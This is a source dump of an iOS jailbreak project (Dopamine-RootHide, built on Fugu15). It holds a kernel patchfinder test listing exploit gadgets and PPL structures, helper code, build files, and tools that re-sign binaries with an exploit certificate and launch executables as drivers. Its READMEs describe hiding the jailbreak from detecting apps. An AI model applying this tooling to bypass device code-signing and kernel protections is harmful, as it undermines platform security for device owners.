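__OSX_AVAILABLE_STARTING(__MAC_10_7, __IPHONE_5_0)
XPC_EXPORT XPC_MALLOC XPC_RETURNS_RETAINED XPC_WARN_RESULT XPC_NONNULL1
xpc_endpoint_t _Nonnull
xpc_endpoint_create(xpc_connection_t _Nonnull connection);

#endif // __XPC_ENDPOINT_H__

--------------------------------------------------------------------------------
/Packages/Fugu15KernelExploit/Sources/CBindings/xpc/module.modulemap:
--------------------------------------------------------------------------------
module XPC [system] [extern_c] {
    header "xpc.h"
    header "availability.h"
    header "base.h"
    header "activity.h"
    header "connection.h"
    header "debug.h"
    header "endpoint.h"
    export *
}

--------------------------------------------------------------------------------
/Packages/Fugu15KernelExploit/Sources/Fugu15KernelExploit/Logger.swift:
--------------------------------------------------------------------------------
//
//  Logger.swift
//  kexploitd
//
//  Created by Linus Henze.
//  Copyright © 2021/2022 Pinauten GmbH. All rights reserved.
//

import Foundation

/// Process-wide logging helper.
///
/// Every message goes to `NSLog` with a "Logger: " prefix and, when
/// `logFileHandle` is set, is also written to that handle followed by a
/// newline. Errors from the handle write are discarded (`try?`).
class Logger {
    /// Optional second sink for log lines; nil disables it.
    static var logFileHandle: FileHandle?

    /// Logs `s` to NSLog and to `logFileHandle` when one is set.
    static func print(_ s: String) {
        NSLog("Logger: %@", s)

        // Bind the handle once instead of nil-checking and then force-reading
        // the static a second time with unsafelyUnwrapped.
        if let handle = logFileHandle {
            try? handle.write(contentsOf: (s + "\n").data(using: .utf8) ?? Data())
        }
    }

    /// Formats `s` with `args` (`String(format:arguments:)`) and logs the result.
    static func fmt(_ s: String, _ args: CVarArg...) {
        print(String(format: s, arguments: args))
    }

    /// Logs `s` prefixed with "Status: ".
    static func status(_ s: String) {
        print("Status: \(s)")
    }
}

--------------------------------------------------------------------------------
/Packages/KernelPatchfinder/.gitignore:
--------------------------------------------------------------------------------
.DS_Store
/.build
/*.xcodeproj
xcuserdata/
DerivedData/
.swiftpm/xcode/
/Package.resolved

--------------------------------------------------------------------------------
/Packages/KernelPatchfinder/LICENSE:
--------------------------------------------------------------------------------
MIT License

Copyright (c) 2022 Pinauten GmbH

Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:

The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.

THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.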
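IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.

--------------------------------------------------------------------------------
/Packages/KernelPatchfinder/Package.swift:
--------------------------------------------------------------------------------
// swift-tools-version:5.3
// The swift-tools-version declares the minimum version of Swift required to build this package.

import PackageDescription

let package = Package(
    name: "KernelPatchfinder",
    platforms: [
        .iOS(.v14),
        .macOS(.v11)
    ],
    products: [
        // Products define the executables and libraries a package produces, and make them visible to other packages.
        .library(
            name: "KernelPatchfinder",
            targets: ["KernelPatchfinder"]),
        .executable(name: "KernelPatchfinderTester", targets: ["KernelPatchfinderTester"])
    ],
    dependencies: [
        // Dependencies declare other packages that this package depends on.
        // NOTE(review): all three dependencies follow the moving `master` branch, and this
        // package's .gitignore excludes /Package.resolved, so no revision is recorded here.
        // A build picks up whatever `master` contains at resolve time; pin a revision or a
        // version if reproducible, reviewable builds are needed.
        .package(name: "SwiftUtils", url: "https://github.com/pinauten/SwiftUtils", .branch("master")),
        .package(name: "SwiftMachO", url: "https://github.com/pinauten/SwiftMachO", .branch("master")),
        .package(name: "PatchfinderUtils", url: "https://github.com/pinauten/PatchfinderUtils", .branch("master"))
    ],
    targets: [
        // Targets are the basic building blocks of a package. A target can define a module or a test suite.
        // Targets can depend on other targets in this package, and on products in packages this package depends on.
        .target(
            name: "KernelPatchfinder",
            dependencies: ["SwiftUtils", "SwiftMachO", "PatchfinderUtils"]),
        .testTarget(
            name: "KernelPatchfinderTests",
            dependencies: ["KernelPatchfinder"]),
        .target(
            name: "KernelPatchfinderTester",
            dependencies: ["SwiftUtils", "SwiftMachO", "KernelPatchfinder"]),
    ]
)

--------------------------------------------------------------------------------
/Packages/KernelPatchfinder/README.md:
--------------------------------------------------------------------------------
# KernelPatchfinder

An iOS Kernel Patchfinder, supporting iOS 15. Used by [Fugu15](https://github.com/pinauten/Fugu15).

--------------------------------------------------------------------------------
/Packages/KernelPatchfinder/Tests/KernelPatchfinderTests/KernelPatchfinderTests.swift:
--------------------------------------------------------------------------------
//
//  KernelPatchfinderTests.swift
//  KernelPatchfinder
//
//  Created by Linus Henze.
//  Copyright © 2022 Pinauten GmbH. All rights reserved.
//

import XCTest
@testable import KernelPatchfinder
import SwiftMachO
import PatchfinderUtils

final class KernelPatchfinderTests: XCTestCase {
    /// Loads a kernelcache from disk and checks that every patchfinder
    /// property listed below resolves to a non-nil value.
    ///
    /// NOTE(review): the kernelcache path is an absolute path on the author's
    /// machine, so the test can only run where that file exists.
    func testPatchfinder() throws {
        /*guard let pf = KernelPatchfinder.running else {
            XCTFail("KernelPatchfinder.running == nil!")
            return
        }*/

        // /Users/linus/kernelcache.release.iphone11.raw
        // /Users/linus/Desktop/Fugu15_OBTS/Server/kernelcache.release.iphone14.raw
        // The function already throws, so use `try`: a missing or unreadable
        // file is reported as a test failure instead of crashing the runner
        // through `try!`.
        let kernel = try MachO(fromFile: "/Users/linus/kernelcache.release.iphone11.raw", okToLoadFAT: false)
        guard let pf = KernelPatchfinder(kernel: kernel) else {
            XCTFail("KernelPatchfinder(kernel:) == nil!")
            return
        }

        XCTAssertNotNil(pf.allproc)
        XCTAssertNotNil(pf.cpu_ttep)
        XCTAssertNotNil(pf.pmap_enter_options_addr)
        XCTAssertNotNil(pf.hw_lck_ticket_reserve_orig_allow_invalid_signed)
        XCTAssertNotNil(pf.hw_lck_ticket_reserve_orig_allow_invalid)
        XCTAssertNotNil(pf.br_x22_gadget)
        XCTAssertNotNil(pf.exception_return)
        XCTAssertNotNil(pf.ldp_x0_x1_x8_gadget)
        XCTAssertNotNil(pf.exception_return_after_check)
        XCTAssertNotNil(pf.exception_return_after_check_no_restore)
        XCTAssertNotNil(pf.str_x8_x9_gadget)
        XCTAssertNotNil(pf.str_x0_x19_ldr_x20)
        XCTAssertNotNil(pf.pmap_set_nested)
        XCTAssertNotNil(pf.pmap_nest)
        XCTAssertNotNil(pf.pmap_remove_options)
        XCTAssertNotNil(pf.pmap_mark_page_as_ppl_page)
        XCTAssertNotNil(pf.pmap_create_options)
        XCTAssertNotNil(pf.gIOCatalogue)
        XCTAssertNotNil(pf.terminateDriversForModule)
        XCTAssertNotNil(pf.kalloc_data_external)
        XCTAssertNotNil(pf.ml_sign_thread_state)
        XCTAssertNotNil(pf.ppl_handler_table)
        XCTAssertNotNil(pf.pmap_image4_trust_caches)
        XCTAssertNotNil(pf.kernel_el)
        XCTAssertNotNil(pf.TH_RECOVER)
        XCTAssertNotNil(pf.TH_KSTACKPTR)
        XCTAssertNotNil(pf.ACT_CONTEXT)
        XCTAssertNotNil(pf.ACT_CPUDATAP)
        XCTAssertNotNil(pf.ITK_SPACE)
        XCTAssertNotNil(pf.VM_MAP_PMAP)
        XCTAssertNotNil(pf.PORT_LABEL)
    }
}

--------------------------------------------------------------------------------
/Packages/PatchfinderUtils/.gitignore:
--------------------------------------------------------------------------------
.DS_Store
/.build
/*.xcodeproj
xcuserdata/
DerivedData/
.swiftpm/xcode/
/Package.resolved

--------------------------------------------------------------------------------
/Packages/PatchfinderUtils/LICENSE: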
-------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2021/2022 Pinauten GmbH 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Packages/PatchfinderUtils/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.3 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "PatchfinderUtils", 8 | platforms: [ 9 | .iOS(.v14), 10 | .macOS(.v11) 11 | ], 12 | products: [ 13 | // Products define the executables and libraries a package produces, and make them visible to other packages. 
14 | .library( 15 | name: "PatchfinderUtils", 16 | targets: ["PatchfinderUtils"]), 17 | ], 18 | dependencies: [ 19 | // Dependencies declare other packages that this package depends on. 20 | .package(name: "SwiftUtils", url: "https://github.com/pinauten/SwiftUtils", .branch("master")), 21 | .package(name: "SwiftMachO", url: "https://github.com/pinauten/SwiftMachO", .branch("master")) 22 | ], 23 | targets: [ 24 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 25 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 26 | .target(name: "CFastFind"), 27 | .target( 28 | name: "PatchfinderUtils", 29 | dependencies: ["CFastFind", "SwiftUtils", "SwiftMachO"]), 30 | ] 31 | ) 32 | -------------------------------------------------------------------------------- /Packages/PatchfinderUtils/README.md: -------------------------------------------------------------------------------- 1 | # PatchfinderUtils 2 | 3 | Utilities for patchfinding. 4 | -------------------------------------------------------------------------------- /Packages/PatchfinderUtils/Sources/CFastFind/include/CFastFind.h: -------------------------------------------------------------------------------- 1 | // 2 | // CFastFind.h 3 | // CFastFind 4 | // 5 | // Created by Linus Henze. 6 | // Copyright © 2021/2022 Pinauten GmbH. All rights reserved. 
7 | // 8 | 9 | #ifndef CFastFind_h 10 | #define CFastFind_h 11 | 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | bool CFastFind(const void* __nonnull buffer, size_t bufLen, const uint32_t* __nonnull insts, size_t instLen, size_t* __nonnull offset); 18 | 19 | uint64_t aarch64_emulate_adr(uint32_t instruction, uint64_t pc); 20 | uint64_t aarch64_emulate_branch(uint32_t instruction, uint64_t pc); 21 | uint64_t aarch64_emulate_b(uint32_t instr, uint64_t pc); 22 | uint64_t aarch64_emulate_bl(uint32_t instr, uint64_t pc); 23 | uint64_t aarch64_emulate_compare_branch(uint32_t instruction, uint64_t pc); 24 | uint64_t aarch64_emulate_conditional_branch(uint32_t instruction, uint64_t pc); 25 | uint64_t aarch64_emulate_adrp(uint32_t instruction, uint64_t pc); 26 | bool aarch64_emulate_add_imm(uint32_t instruction, uint32_t * __nonnull dst, uint32_t * __nonnull src, uint32_t * __nonnull imm); 27 | uint64_t aarch64_emulate_adrp_add(uint32_t instruction, uint32_t addInstruction, uint64_t pc); 28 | uint64_t aarch64_emulate_adrp_ldr(uint32_t instruction, uint32_t ldrInstruction, uint64_t pc); 29 | uint64_t aarch64_emulate_ldr(uint32_t ldrInstruction, uint64_t pc); 30 | uint64_t aarch64_get_ldr_off(uint32_t ldrInstruction); 31 | uint64_t find_xref_to(const void * __nonnull start, const void * __nonnull end, uint64_t xrefTo, uint64_t pc); 32 | uint64_t find_xref_to_data(const void * __nonnull start, const void * __nonnull end, uint64_t xrefTo, uint64_t pc); 33 | uint64_t find_xref_branch(const void * __nonnull start, const void * __nonnull end, uint64_t xrefTo, uint64_t pc); 34 | 35 | // Also define some IOKit stuff... 
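extern const mach_port_t kIOMasterPortDefault;

extern mach_port_t IORegistryEntryFromPath(mach_port_t mainPort, const io_string_t __nonnull path);
extern CFTypeRef __nullable IORegistryEntryCreateCFProperty(mach_port_t entry, CFStringRef __nonnull key, CFAllocatorRef __nullable allocator, uint32_t options);
extern kern_return_t IOObjectRelease(mach_port_t object);

#endif /* CFastFind_h */

--------------------------------------------------------------------------------
/Packages/ProcessCommunication/.gitignore:
--------------------------------------------------------------------------------
.DS_Store
/.build
/*.xcodeproj
xcuserdata/
DerivedData/
.swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata

--------------------------------------------------------------------------------
/Packages/ProcessCommunication/Package.swift:
--------------------------------------------------------------------------------
// swift-tools-version:5.4
// The swift-tools-version declares the minimum version of Swift required to build this package.

import PackageDescription

let package = Package(
    name: "ProcessCommunication",
    platforms: [
        .iOS(.v14),
        .macOS(.v11)
    ],
    products: [
        // Products define the executables and libraries a package produces, and make them visible to other packages.
        .library(
            name: "ProcessCommunication",
            targets: ["ProcessCommunication"])
    ],
    targets: [
        // Targets are the basic building blocks of a package. A target can define a module or a test suite.
        // Targets can depend on other targets in this package, and on products in packages this package depends on.
        .target(
            name: "ProcessCommunication",
            dependencies: []),
    ]
)

--------------------------------------------------------------------------------
/Packages/ProcessCommunication/README.md:
--------------------------------------------------------------------------------
# ProcessCommunication

Simple process communication library.

--------------------------------------------------------------------------------
/Packages/ProcessCommunication/Sources/ProcessCommunication/ProcessCommunication.swift:
--------------------------------------------------------------------------------
//
//  ProcessCommunication.swift
//  ProcessCommunication
//
//  Created by Linus Henze.
//  Copyright © 2021/2022 Pinauten GmbH. All rights reserved.
//

import Foundation

/// Exchanges commands (lists of strings) over a pair of file handles.
///
/// Wire format: the UTF-8 bytes of each argument, with byte 0x01 between
/// arguments and byte 0x00 after the last one. The two byte values are
/// therefore reserved and cannot appear inside an argument. The format has no
/// length prefix and no authentication; the peer is whoever holds the other
/// end of the handles.
public class ProcessCommunication {
    public let read: FileHandle
    public let write: FileHandle

    public init(read: FileHandle, write: FileHandle) {
        self.read = read
        self.write = write
    }

    /// Reads one command from `read`, one byte at a time.
    ///
    /// - Returns: the arguments of the command, or nil on end of file or on a
    ///   read error before the 0x00 terminator was seen. An argument whose
    ///   bytes are not valid UTF-8 is returned as an empty string.
    public func receiveCommand() -> [String]? {
        var fields: [String] = []
        var pending = Data()
        while true {
            // A read error, a nil result and an empty result all end the command.
            guard let chunk = try? read.read(upToCount: 1), let byte = chunk.first else {
                return nil
            }

            switch byte {
            case 0:
                // Terminator: the pending bytes are the last argument.
                fields.append(String(data: pending, encoding: .utf8) ?? "")
                return fields
            case 1:
                // Separator: finish the current argument and start the next.
                fields.append(String(data: pending, encoding: .utf8) ?? "")
                pending = Data()
            default:
                pending.append(byte)
            }
        }
    }

    /// Writes one command to `write`.
    ///
    /// An argument that contains the reserved bytes 0x00 or 0x01 would be
    /// split or cut short by the receiver, so such a command is rejected
    /// before anything is written.
    ///
    /// - Returns: true when every byte was written; false when an argument
    ///   contains a reserved byte or a write failed. An empty `args` writes
    ///   nothing and returns true.
    @discardableResult
    public func sendCommand(_ args: [String]) -> Bool {
        let payloads = args.map { Data($0.utf8) }
        guard !payloads.contains(where: { $0.contains(0) || $0.contains(1) }) else {
            return false
        }

        do {
            let lastIndex = payloads.count - 1
            for (index, payload) in payloads.enumerated() {
                try write.write(contentsOf: payload)
                // 0x01 separates arguments, 0x00 ends the command.
                let marker: UInt8 = index == lastIndex ? 0 : 1
                try write.write(contentsOf: Data(repeating: marker, count: 1))
            }

            return true
        } catch _ {
            return false
        }
    }

    /// Variadic convenience form of `sendCommand(_:)`.
    @discardableResult
    public func sendCommand(_ args: String...) -> Bool {
        sendCommand(args)
    }
}

--------------------------------------------------------------------------------
/README.dev.md:
--------------------------------------------------------------------------------
# Dopamine(RootHide)

RootHide is a completely hidden rootless jailbreak solution without needing to inject/modify/patch/hook apps.

This project is the RootHide implementation based on Dopamine Jailbreak.


# Progress

- [x] Remove fakelib
- [x] Remove bind mount
- [x] Remove system-wide dyld file patch
- [x] Unsandbox systemhook.dylib before injected it
- [x] Randomize systemhook.dylib file name
- [x] Randomize the /var/jb/ fixed path
- [x] Move all stuffs from preboot to var
- [x] Add jailbreak environment variable
- [x] linker/loader works with randomized /var/jb/
- [x] symlinks works with randomized /var/jb/
- [x] Implements a middle layer to convert path
- [x] Adapt theos tools for RootHide
- [x] Original Rootless Compat Layer
- [x] Adapt bootstraps for RootHide
- [x] Adapt Sileo store for RootHide
- [x] Adapt Zebra store for RootHide
- [x] Adapt NewTerm app for RootHide
- [x] Adapt Filza manager for RootHide
- [x] Implement a blacklist selector app
- [x] Implement a /var/-files-clean app


# Credits

[@opa334](https://github.com/opa334/)

[@cameron](https://github.com/CRKatri)

[@kirb](https://github.com/kirb)

[@fugu15](https://github.com/pinauten/Fugu15)

[@jakejames](https://github.com/jakeajames)
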
| 44 | [@coolstar](https://github.com/coolstar) 45 | 46 | [@procursus](https://github.com/ProcursusTeam/Procursus) 47 | 48 | [@theos](https://github.com/theos/theos) 49 | 50 | [@sileo](https://github.com/Sileo/Sileo) 51 | 52 | # Info 53 | 54 | [theos-discord-server](https://theos.dev/discord) 55 | 56 | [sileo-discord-server](https://discord.com/invite/Udn4kQg) 57 | 58 | [chariz-discord-server](https://discord.com/invite/sEzwNF9) 59 | 60 | [procursus-discord-server](https://discord.gg/QJDrrAJPDY) 61 | 62 | 63 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Dopamine(RootHide) 2 | 3 | RootHide is a completely hidden rootless jailbreak solution without needing to inject/modify/patch/hook apps. 4 | 5 | This project is the RootHide implementation based on Dopamine Jailbreak. 6 | 7 | ![text](banner.png) 8 | 9 | - how to install: Download the tipa file and install it in trollstore. You don't have to uninstall rootless dopamine/xina15; you can switch between them by rebooting the device. 10 | 11 | - how to use: after the jailbreak succeeds, the icon of the RootHide Manager App will appear on the home screen. Open it to blacklist the apps that detect jailbreak, and use varClean to clean up junk files generated by other jailbreaks/tweaks. It is that simple. 12 | 13 | - about Tweaks: some tweaks have been ported to roothide. We will launch RootHidePatcher later so that some rootless tweaks can be converted into roothide tweaks. 14 | 15 | - for Developers: dear developers, many tweaks just need to be recompiled to run with roothide, or need only minor modifications; see the developer document: https://github.com/RootHide/Developer 16 | 17 | - for updates and support, follow [@RootHideDev](https://twitter.com/RootHideDev) on twitter or join our [Discord server](https://discord.gg/ZvY2Yjw8GA).
18 | 19 | special thanks to: @opa334 @theosdev @ProcursusTeam @eveyineee @jakeashacks 20 | 21 | # More Info 22 | 23 | - RootHide Discord Server: https://discord.gg/ZvY2Yjw8GA 24 | 25 | - Havoc Discord Server: https://discord.gg/s2zc45h 26 | 27 | - Chariz Discord Server: https://discord.gg/sEzwNF9 28 | 29 | - Zebra Discord Server: https://discord.gg/6CPtHBU 30 | 31 | - Sileo Discrod Server: https://discord.gg/Udn4kQg 32 | 33 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /*.xcodeproj 4 | xcuserdata/ 5 | DerivedData/ 6 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 7 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/Exe2Driver: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Tools/Exe2Driver/Exe2Driver -------------------------------------------------------------------------------- /Tools/Exe2Driver/Makefile: -------------------------------------------------------------------------------- 1 | TARGET=Exe2Driver 2 | CONFIG=release 3 | 4 | include ../Makefile.inc 5 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "object": { 3 | "pins": [ 4 | { 5 | "package": "SwiftMachO", 6 | "repositoryURL": "https://github.com/pinauten/SwiftMachO", 7 | "state": { 8 | "branch": "master", 9 | "revision": "d433b349d7e69bb8fd5d18ea5cdbcd8b731ddf55", 10 | "version": null 11 | } 12 | }, 13 | { 14 | "package": "SwiftUtils", 15 | "repositoryURL": "https://github.com/pinauten/SwiftUtils", 16 | "state": { 17 | "branch": "master", 18 | "revision": 
"1d37faabb4c58b3152394c9b6e1c1a68507646b9", 19 | "version": null 20 | } 21 | } 22 | ] 23 | }, 24 | "version": 1 25 | } 26 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.3 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "Exe2Driver", 8 | platforms: [ 9 | .macOS(.v11) 10 | ], 11 | products: [ 12 | // Products define the executables and libraries a package produces, and make them visible to other packages. 13 | .executable( 14 | name: "Exe2Driver", 15 | targets: ["Exe2Driver"]), 16 | ], 17 | dependencies: [ 18 | // Dependencies declare other packages that this package depends on. 19 | .package(name: "SwiftUtils", url: "https://github.com/pinauten/SwiftUtils", .branch("master")), 20 | .package(name: "SwiftMachO", url: "https://github.com/pinauten/SwiftMachO", .branch("master")) 21 | ], 22 | targets: [ 23 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 24 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 25 | .target( 26 | name: "Exe2Driver", 27 | dependencies: ["SwiftUtils", "SwiftMachO"]) 28 | ] 29 | ) 30 | -------------------------------------------------------------------------------- /Tools/Exe2Driver/README.md: -------------------------------------------------------------------------------- 1 | # Exe2Driver 2 | 3 | Exe2Driver can be used to convert a regular executable into a DriverKit driver which can then be launched using SpawnDrv/kexploitd. 
4 | -------------------------------------------------------------------------------- /Tools/Makefile: -------------------------------------------------------------------------------- 1 | TARGETS=fastPathSign BuildVFS Exe2Driver installHaxx 2 | TARGETS_CLEAN=$(addsuffix _clean, $(TARGETS)) 3 | TARGETS_BUILD_CLEAN=$(addsuffix _build_clean, $(TARGETS)) 4 | 5 | all: $(TARGETS) 6 | clean: $(TARGETS_CLEAN) 7 | build_clean: $(TARGETS_BUILD_CLEAN) 8 | 9 | .PHONY: all clean build_clean 10 | 11 | $(TARGETS): FORCE 12 | @echo make -C $@ 13 | @$(MAKE) -C $@ 14 | 15 | $(TARGETS_CLEAN): FORCE 16 | @echo make -C $(@:_clean=) clean 17 | @$(MAKE) -C $(@:_clean=) clean 18 | 19 | $(TARGETS_BUILD_CLEAN): FORCE 20 | @echo make -C $(@:_build_clean=) build_clean 21 | @$(MAKE) -C $(@:_build_clean=) build_clean 22 | 23 | FORCE: ; 24 | -------------------------------------------------------------------------------- /Tools/Makefile.inc: -------------------------------------------------------------------------------- 1 | SWIFT_BUILD_ARGS=-c $(CONFIG) 2 | 3 | SWIFT_BUILD_ARGS_X86_64=$(SWIFT_BUILD_ARGS) -Xswiftc -target -Xswiftc x86_64-apple-macos12.0 4 | SWIFT_BUILD_ARGS_ARM64=$(SWIFT_BUILD_ARGS) -Xswiftc -target -Xswiftc arm64-apple-macos12.0 5 | 6 | all: $(TARGET) 7 | 8 | build_clean: 9 | rm -rf .build_x86_64 .build_arm64 10 | 11 | clean: build_clean 12 | rm -f $(TARGET) 13 | 14 | .PHONY: all build_clean clean 15 | 16 | .build_x86_64/$(CONFIG)/$(TARGET): FORCE 17 | swift build --build-path .build_x86_64 $(SWIFT_BUILD_ARGS_X86_64) 18 | 19 | .build_arm64/$(CONFIG)/$(TARGET): FORCE 20 | swift build --build-path .build_arm64 $(SWIFT_BUILD_ARGS_ARM64) 21 | 22 | $(TARGET): .build_x86_64/$(CONFIG)/$(TARGET) .build_arm64/$(CONFIG)/$(TARGET) 23 | lipo -create .build_x86_64/$(CONFIG)/$(TARGET) .build_arm64/$(CONFIG)/$(TARGET) -output $(TARGET) 24 | 25 | FORCE: ; 26 | -------------------------------------------------------------------------------- /Tools/fastPathSign/.gitignore: 
-------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /*.xcodeproj 4 | xcuserdata/ 5 | DerivedData/ 6 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 7 | -------------------------------------------------------------------------------- /Tools/fastPathSign/Makefile: -------------------------------------------------------------------------------- 1 | TARGET=fastPathSign 2 | CONFIG=release 3 | 4 | include ../Makefile.inc 5 | -------------------------------------------------------------------------------- /Tools/fastPathSign/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.4 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "fastPathSign", 8 | platforms: [ 9 | .macOS(.v11) 10 | ], 11 | products: [ 12 | // Products define the executables and libraries a package produces, and make them visible to other packages. 13 | .executable( 14 | name: "fastPathSign", 15 | targets: ["fastPathSign"]), 16 | ], 17 | targets: [ 18 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 19 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 20 | .systemLibrary(name: "Security_Codesign"), 21 | .executableTarget( 22 | name: "fastPathSign", 23 | dependencies: ["Security_Codesign"]) 24 | ] 25 | ) 26 | -------------------------------------------------------------------------------- /Tools/fastPathSign/README.md: -------------------------------------------------------------------------------- 1 | # fastPathSign 2 | 3 | fastPathSign is a tool to re-sign MachO's with the fastPath exploit cert. 
4 | 5 | # Prerequisites 6 | 7 | Make sure you have imported the fastPath exploit certificate into your Keychain (Exploits/fastPath/arm.pfx, password: "password"). 8 | The certificate must be named "Pinauten PWN Cert". 9 | 10 | # Usage 11 | 12 | First ad-hoc sign the MachO, including the entitlements you need. 13 | Then run `fastPathSign <path to your MachO>` to re-sign your MachO. This will keep the entitlements, identifier, etc. 14 | -------------------------------------------------------------------------------- /Tools/fastPathSign/Sources/Security_Codesign/module.modulemap: -------------------------------------------------------------------------------- 1 | module Security_Codesign [system] { 2 | header "SecCodeSigner.h" 3 | } 4 | -------------------------------------------------------------------------------- /Tools/fastPathSign/fastPathSign: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/roothide/Dopamine-roothide/cb9d8a03f0aa16f090bb783764bb93393f7908bf/Tools/fastPathSign/fastPathSign -------------------------------------------------------------------------------- /Tools/installHaxx/.gitignore: -------------------------------------------------------------------------------- 1 | .DS_Store 2 | /.build 3 | /*.xcodeproj 4 | xcuserdata/ 5 | DerivedData/ 6 | .swiftpm/xcode/package.xcworkspace/contents.xcworkspacedata 7 | -------------------------------------------------------------------------------- /Tools/installHaxx/Makefile: -------------------------------------------------------------------------------- 1 | TARGET=installHaxx 2 | CONFIG=release 3 | 4 | include ../Makefile.inc 5 | -------------------------------------------------------------------------------- /Tools/installHaxx/Package.resolved: -------------------------------------------------------------------------------- 1 | { 2 | "object": { 3 | "pins": [ 4 | { 5 | "package": "SwiftMachO", 6 | "repositoryURL": "https://github.com/pinauten/SwiftMachO", 7 | 
"state": { 8 | "branch": "master", 9 | "revision": "d433b349d7e69bb8fd5d18ea5cdbcd8b731ddf55", 10 | "version": null 11 | } 12 | }, 13 | { 14 | "package": "SwiftUtils", 15 | "repositoryURL": "https://github.com/pinauten/SwiftUtils", 16 | "state": { 17 | "branch": "master", 18 | "revision": "1d37faabb4c58b3152394c9b6e1c1a68507646b9", 19 | "version": null 20 | } 21 | } 22 | ] 23 | }, 24 | "version": 1 25 | } 26 | -------------------------------------------------------------------------------- /Tools/installHaxx/Package.swift: -------------------------------------------------------------------------------- 1 | // swift-tools-version:5.4 2 | // The swift-tools-version declares the minimum version of Swift required to build this package. 3 | 4 | import PackageDescription 5 | 6 | let package = Package( 7 | name: "installHaxx", 8 | platforms: [ 9 | .iOS(.v14), 10 | .macOS(.v11) 11 | ], 12 | products: [ 13 | // Products define the executables and libraries a package produces, and make them visible to other packages. 14 | .executable( 15 | name: "installHaxx", 16 | targets: ["installHaxx"]), 17 | ], 18 | dependencies: [ 19 | // Dependencies declare other packages that this package depends on. NOTE(review): both dependencies below follow the moving `master` branch rather than a tagged version or an exact revision; the commits actually built are the ones recorded in Package.resolved, so keep that file committed and review every change to its pinned revisions. 20 | .package(name: "SwiftUtils", url: "https://github.com/pinauten/SwiftUtils", .branch("master")), 21 | .package(name: "SwiftMachO", url: "https://github.com/pinauten/SwiftMachO", .branch("master")) 22 | ], 23 | targets: [ 24 | // Targets are the basic building blocks of a package. A target can define a module or a test suite. 25 | // Targets can depend on other targets in this package, and on products in packages this package depends on. 
